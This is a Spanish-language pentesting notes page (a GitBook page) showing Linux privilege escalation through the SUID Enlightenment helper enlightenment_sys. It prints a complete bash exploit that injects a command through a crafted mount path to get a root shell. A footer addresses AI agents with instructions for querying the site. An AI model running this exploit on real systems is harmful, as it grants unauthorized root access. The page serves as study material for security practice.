> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/privesc/suid/suid-enlightenment-linux-privilege-escalation.md).

# SUID (Enlightenment) – Escalada de privilegios en Linux

## Qué es

Los binarios SUID se ejecutan con los privilegios de su propietario, a menudo root. Un binario SUID vulnerable, desactualizado o excesivamente flexible puede leer archivos protegidos, iniciar una shell con privilegios o ejecutar código controlado por un atacante. Esta página específica se centra en **SUID (Enlightenment)** y mantiene práctico el flujo de explotación: identificar la condición, validarla de forma segura y luego ejecutar la carga útil mínima necesaria para demostrar el impacto.

## Enumeración

Comienza confirmando el contexto local y la configuración incorrecta exacta antes de ejecutar la ruta de explotación.

```bash
find / -perm -4000 -type f 2>/dev/null
```

## Ejemplos

Comenzamos buscando archivos SUID que pertenezcan a nuestro usuario. Para ello, ejecuta el siguiente comando:

```bash
find / -perm -4000 2>/dev/null
```

Al analizar la salida, notamos la presencia del binario **enlightenment**.

<figure><img src="/files/39363a87c3e7d0641f4bd063becf25cae707c086" alt=""><figcaption></figcaption></figure>

Estamos explorando las vulnerabilidades asociadas con este binario. Tras investigar un poco, identificamos un exploit aplicable para la versión **0.25.4**.

{% embed url="<https://www.exploit-db.com/exploits/51180>" %}

<figure><img src="/files/a448cee921953dd5fe4c2063b7360f089c42d9e9" alt=""><figcaption></figcaption></figure>

Sin embargo, al comprobar la versión actual de Enlightenment instalada en el sistema, encontramos que esta es la versión anterior **0.23.1**.

<figure><img src="/files/1741f3ace9e00d8a9ad2e1a97b75f597b4192eae" alt=""><figcaption></figcaption></figure>

Probamos el siguiente exploit para aprovechar la vulnerabilidad:

```bash
#!/usr/bin/bash

file="/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
rm -rf /tmp/exploit
rm -rf /tmp/net
```

```bash
./exploit.sh
```

Después de realizar el exploit, obtenemos una shell con privilegios de root.

<figure><img src="/files/0a8c5284ffdf9a13b46e2b61834f4c41a4c33c6b" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/privesc/suid/suid-enlightenment-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
